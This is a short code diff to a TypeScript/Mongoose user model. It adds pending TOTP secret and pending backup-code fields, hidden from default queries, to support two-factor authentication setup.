@@ -121,6 +121,15 @@ const userSchema = new Schema<IUser>(
       type: [BackupCodeSchema],
       select: false,
     },
+    pendingTotpSecret: {
+      type: String,
+      select: false,
+    },
+    pendingBackupCodes: {
+      type: [BackupCodeSchema],
+      select: false,
+      default: undefined,
+    },
     refreshToken: {
       type: [SessionSchema],
     },


@@ -26,6 +26,12 @@ export interface IUser extends Document {
     used: boolean;
     usedAt?: Date | null;
   }>;
+  pendingTotpSecret?: string;
+  pendingBackupCodes?: Array<{
+    codeHash: string;
+    used: boolean;
+    usedAt?: Date | null;
+  }>;
   refreshToken?: Array<{
     refreshToken: string;
   }>;